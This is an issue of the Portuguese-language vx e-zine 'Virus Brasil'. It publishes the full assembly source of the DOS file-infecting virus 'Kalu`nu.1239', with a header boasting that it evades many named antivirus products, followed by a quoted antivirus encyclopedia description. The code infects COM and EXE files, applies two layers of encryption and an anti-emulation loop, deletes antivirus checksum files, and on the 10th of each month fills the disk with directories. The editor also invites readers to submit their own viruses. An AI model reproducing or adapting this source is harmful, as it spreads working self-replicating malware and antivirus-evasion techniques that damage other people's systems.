Virus Brasil6:(VIRBR06.555):01/04/2000 << Back To Virus Brasil6

─────────────────────────────────────────────────────────────────────────── / __ ___ | / | |__) | | (__ |/ | | \ |___| ___) ─────────────────────────────────────────────────────────────────────────── ────────────────────────────────────── 55555 - Kalu`nu.1239 por Kamaileon ────────────────────────────────────── É muito louco ver que seu trabalho esta servindo pra alguma coisa, que a galera ta lendo o zine, esta tendo dúvidas e o melhor, est╞o sem- pre dispostos a ajudar. Vo6 devem estar de saco cheio de saber sobre a minha falta de tem- po, para concluir o zine, sozinho, devo necessitar de umas 90 horas por ediç╞o... E sozinho, isso e' muito phoda e nao tenho esse tempo, como paleativo , procuro sempre pedir pra galera mandar seus vírus, assim o zine terá conteúdo e também um veículo de distribuiç╞o de informaçΣes sem serem somente as minhas ... Agradeço à todos que já me mandaram algum vírus ou texto e você ai que acha que seu vírus ta ruim, ou que ele é muito simples, n╞o se a- canhe e mande-o para nós, na pior das hipóteses daremos umas dicas para você melhorar seu projeto ! Segue abaixo um vírus de um camarada nosso, ja' bem conhecido no exterior, procure ele na undernet no canal virus ( às vezes eu também apareço por lá ) , vira e mexe ele esta por lá ... O código fonte n╞o esta comentado ao longo do vírus, comentários s╞o encontrados no início do mesmo, no qual s╞o comentados os fatores principais da criança, dúvidas adicionais, procure um norton guides pa- ra ASM ou mande um mail pra gente ! Valeu Kamaileon pelo fonte de seu vírus e por todos os toques que tem me dado e espero que seu W32 saia em breve e que nossos leitores possam aderir à infecçΣes em Windows ... T + Valeu ──────────────────────────────────────────────────────────────────────────── __ __ / __ . __ __ __ __ ___ __ | | | | \ | | _ | | |_ | | |\| | |_ |__ |__| |__/ | |__| |__| | |__| | | | |__ ──────────────────────────────────────────────────────────────────────────── ;******-< Author Info >-**********************************************; ; Virus Name : Kalu`nu ; ; Author : Kamaileon ; ; : aKa Decimator ; ; Group : The Shadow Virus Group [TSVG] ; ; : ; ; Author e-mail : ; ; : ; ; Origin : Brasil, Ago '99 ; ; Irc : #vir , #virus , #vxtrader , #shadowvx ; ; Icq uin : #48473940 ; ; ; ;******-< Bio-Code Info >-**********************************************; ; Compiling : Tasm/m3 destru.asm ; ; : Tlink/t destru.obj ; ; Targetz : EXE/COM files (Append Method) ; ; Size : 1239 bytes ; ; Resident : Nope ; ; PolyMorphic : Nope ; ; Encryption : Two layers, with XOR and NOT instructions ; ; Stealth : Just the old ones, nothing new in this side ; ; Tunneling : Nope ; ; Retro : Delete some CRC filez ; ; Payload : Create some Directorys and show a msg ; ; Trigger : 10th of every month ; ; Armoury : int24h adress change crashs some debuggers ; ; AntiHeuristics : Encryption and AntiEmul avoids all flags ; ; ; ;******-< Peculiarities >-**********************************************; ; - Search fo every file and verify the extension of him, so infects only ; ; EXE and COM filez. ; ; - As infection marker he makes equal the days field and secs field. ; ; - The 2 layers of encryption and Ant-Emulation loop does all the work ; ; against fucka AVs. ; ; - Obs: The 2 Encryption routines are little differents. ; ; - The checked extensions are .CO* and .EX* , this can cause some trouble ; ; if he get another files, but who cares? ; ; - The AntiEmul loop could works like a psychological weapon, bcoz it ; ; causes a strong slowdown in some AVs. ; ; ; ;******-< Greetz and Thanks >-**********************************************; ; Thanks to Pruslas, MetalKid and Raid, for test this. ; ; Greetz for all ppl from #vir #virus #vxtrader #vx-vtc #shadowvx ; ; Raid: Greetz for Toadie and the fucka Creed!! :) ; ; Trev and Tbh: For the funny times in #vir or #virus, buahahahahhahah ; ; ; ;******-< AV's Scan >-**********************************************; ; Name Results Comments ; ; AVP 3.0 build 131 Dont Detect :P ; ; Avast32 3.0 build 162 Dont Detect :P ; ; InVircible 7.02 build 295a Dont Detect :P ; ; Dr.WEB 4/05 Beta Dont Detect :P ; ; VirusBUSTER release1999 Dont Detect :P ; ; McAfee VirusScan 4.0.3 Dont Detect :P ; ; NOD32 Dont Detect :P ; ; NAV 5.00.01a Dont Detect :P ; ; NAV 2000 Dont Detect :P ; ; Ivz 7.02m Dont Detect :P ; ; F-prot 3.05b DOS Dont Detect :P ; ; VirusBuster V8.03.557 Dont Detect :P ; ; Panda AV Platinum 6.08.00 Dont Detect :P ; ; Panda AV Win95/98 6.0 Dont Detect :P ; ; F-Secure AV 4.04 Win95 Dont Detect :P ; ; FindVirus 7.97 Dont Detect :P ; ; RHBVS Version 2.54.05 Dont Detect :P ; ; VirusScan Plus (VSP) Dont Detect :P ; ; ; ; Command AV Win95 v4.57 Sometimes flag some :O ; ; files, as BHound Hibrid ; ; ; ; TBAV 8.09b Win95 Dont Detect Sometimes trigger some flags ; ; (high Heuristic mode) but he dont see the virii :)); ; ; ; PS: TBAV and Command AV probably ; ; dont goes beyond the encryption, ; ; leaving the main code safe. *Test on 2nd Generations ; ; ; ;******-< I love this Job >-**********************************************; ;******-< ShowTime!!! >-**********************************************; code segment assume cs:code,ds:code jumps org 100h EncKey equ 1eh EncKey2 equ 21h begin: push ds mov bp, sp int 03h DeltaOff: mov si, ss:[bp-6] sub si, offset DeltaOff xchg si, bp push cs cs pop es ds mov ax, word ptr [bp+InfectType] mov word ptr [bp+TmpInfectType], ax Fake: mov cx, 0ffffh Anti: db 9ch xchg ax, bx and ax, 666h xor bx, ax xchg bx, ax xor bx, ax not bx shr ax, 4 db 9dh loop Anti cmp word ptr [bp+InfectType], 00h je contin call first call Sec jmp contin InfectType dw ? first: mov cx, (end_virus-Sec+1)/2 lea di, [bp+Sec] mov si, di mov ah, EncKey firstloop: lodsb xor ah, 13h xor al, ah not al stosb loop firstloop ret Sec: mov cx, (end_virus-contin+1)/2 lea di, [bp+contin] mov si, di mov ah, EncKey2 Secloop: lodsb not al xor al, ah xor ah, 13h stosb loop Secloop ret contin: cmp word ptr [bp+InfectType], 1 je restoreCOM cmp word ptr [bp+InfectType], 0 je setDTA jmp restoreEXE old3 db 0cdh, 20h, 0 restoreCOM: mov di, 100h lea si, [bp+offset old3] movsw movsb jmp setDTA restoreEXE: lea di, [bp+storeIP] lea si, [bp+oldIP] movsw movsw movsw movsw setDTA: mov ah, 1ah lea dx, [bp+offset newDTA] int 21h push es mov ax, 3524h int 21h mov [bp+word ptr OldInt24h], bx mov [bp+word ptr OldInt24h+2], es pop es mov ax, 2524h lea dx, [bp+NewInt24Hand] int 21h mov ah, 2ah int 21h cmp dl, 0ah je PayBack mov ah, 4eh next: lea dx, [bp+Filez] mov cx, 7 int 21h jnc VerifyExt jmp exit VerifyExt: push ax cx di es push ds pop es lea dx, [bp+newDTA+1eh] mov di, dx mov cx, 64 mov al, '.' repnz scasb cmp [di], 'OC' je infectCOM cmp [di], 'XE' je infectEXE jmp KiLLCRCs infectEXE: pop es di cx ax mov word ptr [bp+InfectType], 2 call OpenFile je Damm mov ah, 3fh mov cx, 1ch lea dx, [bp+header] int 21h mov al, byte ptr [bp+header] add al, byte ptr [bp+header+1] cmp al, 'M'+'Z' jne Damm jmp cont cont: call saveheader mov al, 02h call seek push ax dx call calcCSIP pop dx ax call calcsize call writevirus xor ax, ax call seek mov ah, 40h mov cx, 1ch lea dx, [bp+header] int 21h call CloseFile mov ah, 4fh jmp NoMatch infectCOM: pop es di cx ax mov word ptr [bp+InfectType], 1 call OpenFile je Damm mov ah, 3fh mov cx, 3 lea dx, [bp+old3] int 21h mov al, 02h call seek mov ax, word ptr [bp+newDTA+1ah] sub ax, 3 mov word ptr [bp+jump+1], ax xor ax, ax call seek mov ah, 40h mov cx, 3 lea dx, [bp+jump] int 21h mov al, 02h call seek call writevirus call CloseFile jmp NoMatch exit: pop ds mov dx, 80h mov ah, 1ah int 21h mov ax, 2524h lea dx, [bp+OldInt24h] int 21h cmp word ptr [bp+TmpInfectType], 1 je HostCOM cmp word ptr [bp+TmpInfectType], 0 je nobody jmp hostEXE nobody: int 20h HostCOM: push 100h retn HostEXE: push ds pop es mov ax, es add ax, 10h add word ptr cs:[bp+storeCS], ax cli add ax, word ptr cs:[bp+storeSS] mov ss, ax mov sp, word ptr cs:[bp+storeSP] sti db 0eah storeIP dw 0 storeCS dw 0 storeSP dw 0 storeSS dw 0 oldIP dw 0 oldCS dw 0fff0h oldSP dw 0 oldSS dw 0fff0h PayBack: mov cx, 235 loopDir: mov ah, 39h lea dx, DirName int 21h inc DirName loop loopDir mov ah, 09h lea dx, [bp+PayMsg] int 21h jmp exit DirName db '!.Kalu`nu',0 PayMsg db 'Im feelin like a bad boy',10,13 db 'Mn just a like a bad boy',10,13 db 'Im rippin up a Rag Doll',10,13 db 'Like throwin away an old toy',10,13 db 'Some babes talkin real loud',10,13 db 'Talkin all about the new crowd',10,13 db 'Try and tell me of an old dream',10,13 db 'A new version of old scene',10,13 db '',10,13 db ' (c) Kalu`nu ','$' KiLLCRCs: pop es di cx ax lea dx, [bp+kill1CRC] call KiLL lea dx, [bp+kill2CRC] call KiLL lea dx, [bp+kill3CRC] call KiLL lea dx, [bp+kill4CRC] call KiLL lea dx, [bp+kill5CRC] call KiLL lea dx, [bp+kill6CRC] call KiLL jmp NoMatch KiLL: mov ax, 4301h xor cx, cx int 21h mov ah, 41h int 21h ret kill1CRC db 'ANTI-VIR.DAT',0 kill2CRC db 'CHKLIST.MS',0 kill3CRC db 'SMARTCHK.CPS',0 kill4CRC db 'AVP.CRC',0 kill5CRC db 'IVB.NTZ',0 kill6CRC db 'CHKLIST.TAV',0 NewInt24Hand: xchg ax, ax iret Damm: call CloseFile NoMatch: mov ah, 4fh jmp next writevirus: call Sec call first mov cx, end_virus-begin lea dx, [bp+offset begin] mov ah, 40h int 21h call first call sec ret saveheader: mov ax, word ptr [bp+header+0eh] mov word ptr [bp+oldSS], ax mov ax, word ptr [bp+header+10h] mov word ptr [bp+oldSP], ax mov ax, word ptr [bp+header+14h] mov word ptr [bp+oldIP], ax mov ax, word ptr [bp+header+16h] mov word ptr [bp+oldCS], ax ret CalcCSIP: push ax mov ax, word ptr [bp+header+8] mov cl, 4 shl ax, cl mov cx, ax pop ax sub ax, cx sbb dx, 0 mov cl, 0ch shl dx, cl mov cl, 4 push ax shr ax, cl add dx, ax shl ax, cl pop cx sub cx, ax mov word ptr [bp+header+14h], cx mov word ptr [bp+header+16h], dx mov word ptr [bp+header+0eh], dx mov word ptr [bp+header+10h], 0fffeh ret calcsize: push ax add ax, end_virus-begin adc dx, 0 mov cl, 7 shl dx, cl mov cl, 9 shr ax, cl add ax, dx inc ax mov word ptr [bp+header+04], ax pop ax mov dx, ax shr ax, cl shl ax, cl sub dx, ax mov word ptr [bp+header+02], dx ret seek: mov ah, 42h xor cx, cx cwd int 21h ret OpenFile: mov ax, 4300h lea dx, [bp+offset newDTA+1eh] int 21h mov word ptr [bp+file_attr], cx mov ax, 4301h lea dx, [bp+offset newDTA+1eh] xor cx, cx int 21h mov ax, 3d02h lea dx, [bp+offset newDTA+1eh] int 21h xchg bx, ax mov ax, 5700h int 21h mov word ptr [bp+file_time], cx mov word ptr [bp+file_date], dx and cx, 0000000000011111b and dx, 0000000000011111b cmp cx, dx ret CloseFile: mov ax, 5701h mov dx, word ptr [bp+file_date] mov cx, word ptr [bp+file_time] and cx, 1111111111100000b and dx, 0000000000011111b or cx, dx mov dx, word ptr [bp+file_date] int 21h mov ah, 3eh int 21h mov ax, 4301h lea dx, [bp+offset newDTA+1eh] mov cx, word ptr [bp+file_attr] int 21h ret VirusName db 'Kalu`nu Virus', 0 Author db 'Kamaileon', 0 VxGroup db 'TSVG - The Shadow Virus Group', 0 OldInt24h dd 00h jump db 0e9h,0,0 TmpInfectType dw ? Filez db '*.*',0 file_attr dw ? file_time dw ? file_date dw ? end_virus: newDTA db 43 dup (?) header db 1ch dup (?) code ends end begin ;************-< End of Virii >-**********************************************; - Comentários: ─────────────── Vamos ver o que a enciclopédia do Avp nos diz sobre o vírus do Kamaileon : Info downloaded de These are dangerous nonmemory resident encrypted parasitic viruses. They search for COM and EXE files in the current directory, then write themselves to the end of the file. Before infecting, the viruses delete the anti-virus data files: ANTI-VIR.DAT CHKLIST.MS SMARTCHK.CPS AVP.CRC IVB.NTZ CHKLIST.TAV On the 10th day of each month the viruses create a lot of empty directories and display the text: Im feelin like a bad boy Mn just a like a bad boy Im rippin up a Rag Doll Like throwin away an old toy Some babes talkin real loud Talkin all about the new crowd Try and tell me of an old dream A new version of old scene (c) Kalunu E e' isso ai ... ──────────────────────────────────────────────────────────────────────────── Copyright ╕ 2000, Vírus Brasil ⌐ ────────────────────────────────────────────────────────────────────────────